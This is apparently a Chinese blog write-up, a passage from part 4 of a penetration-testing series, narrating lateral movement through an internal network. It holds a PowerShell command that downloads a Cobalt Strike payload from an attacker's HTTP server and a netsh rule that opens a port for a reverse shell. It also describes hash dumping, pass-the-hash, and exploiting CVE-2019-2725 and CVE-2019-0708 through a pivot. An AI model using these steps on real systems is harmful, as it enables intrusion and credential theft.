主页 > 网络知识 > 细说渗透江湖之披荆斩棘(4)

细说渗透江湖之披荆斩棘(4)

 

细说渗透江湖之披荆斩棘

 

接下来就是上cs,依然python在服务器起一个http服务,利用powershell下载。

 

细说渗透江湖之披荆斩棘

 

这里执行之后直接卡死了。。。所以退出之后,又重新再来一遍,重新执行下载。

 

 

Powershell.exe“(new-object System.Net.WebClient).DownloadFile(‘:port’,’C:Windowssystem32’)”

 

看到接到请求。

 

细说渗透江湖之披荆斩棘

 

期间又经历了几次掉线之后,终于又上线了。

 

细说渗透江湖之披荆斩棘

 

成功上线,老套路抓密码看一下,由于这里没有抓到明文只抓到了hash。

 

细说渗透江湖之披荆斩棘

 

所以利用pth尝试其他windows主机,看看能否也一起拿下。

 

细说渗透江湖之披荆斩棘

 

拿下其他4台windows,同样的步骤,抓密码翻文件。

 

细说渗透江湖之披荆斩棘

 

在其中一台机器中找到一个文件,里面记录这一台同网段的weblogic的IP,不管那么多先去看看weblogic,发现现在这个IP上没有服务,而且刚才没有扫出来7001,难道是转移IP了?抱着试一试的心态重新扫了一下同网段的7001端口,果然换了一个新的IP,访问内网web7001端口。

 

细说渗透江湖之披荆斩棘

 

前面已经做过socks代理了,利用Proxifier连接,可以直接访问。

既然知道是weblogic,当然是用现有漏洞打一下。

 

细说渗透江湖之披荆斩棘

 

通过cve-2019-2725拿到shell。

 

细说渗透江湖之披荆斩棘

 

信息收集,发现是个双网卡机器。

 

细说渗透江湖之披荆斩棘

 

 

细说渗透江湖之披荆斩棘

 

在weblogic上做代理,然后收集10段端口服务信息,发现其中几台机器开着3389,这里将weblogic的shell联动给msf,利用msf的cve-2019-0708模块,试着打了一下0708。

 

细说渗透江湖之披荆斩棘

 

成功拿下第一台10段的机器,由于这台机器不能出网,只能利用中间weblogic作为跳板,生成一个cs木马,监听地址和端口为weblogic的ip和端口,利用msf上传上去,运行。

这里踩了个坑,反弹给weblogic时一直接不到shell,最后看了半天感觉是防火墙的原因,手动配置防火墙规则。

防火墙规则命令。

 

 

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666

 

成功接到反弹的shell

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!